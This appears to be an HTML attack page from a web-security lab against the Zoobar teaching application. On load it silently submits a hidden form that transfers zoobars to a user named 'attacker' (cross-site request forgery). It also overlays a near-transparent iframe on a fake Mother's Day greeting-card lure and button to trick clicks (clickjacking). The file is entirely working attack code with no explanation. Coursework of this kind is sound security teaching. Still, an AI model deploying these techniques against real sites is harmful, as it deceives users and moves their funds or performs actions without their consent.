<!DOCTYPE html>
<html>
    <head>
        <meta charset='utf-8'>
        <style type="text/css">
            #zbframe{
                width: 1220px;
                height: 400px;
                overflow: hidden;
                border: 0;
                position:absolute;
                left:10px;
                top:10px;
                opacity: 0.01;
                z-index: 1;
            }
            #fake{
                z-index: 0;
            }
            #fake span{
                white-space:nowrap;
                font-size: 25px;
                position:absolute;
                left:50px;
                top:200px;
            }
            #fake input{
                position:absolute;
                left:490px;
                top:267px;
            }
        </style>
        <script>
            function prepare(){
                document.getElementById('tf').submit();
            }
        </script>
    </head>
    <body onload="prepare()"> 
        <form id="tf" method="POST" name="transferform" target="zbframeReal" action="http://zoobar.stanford.edu/transferC.php">
            <input name="zoobars" type="hidden" value="10" size="5">
            <input name="recipient" type="hidden" value="attacker">
            <input name="token" type="hidden" value="a">
            <input name="submission" type="hidden" value="Send">
        </form>
        <div id="fake" class="layer">
            <span>Send a greeting card to your mom on Mother's Day!</span>
            <input type="button" value="Send"/>
        </div>
        <iframe id="zbframe" class="layer" src="c2.html"></iframe>
    </body>
</html>
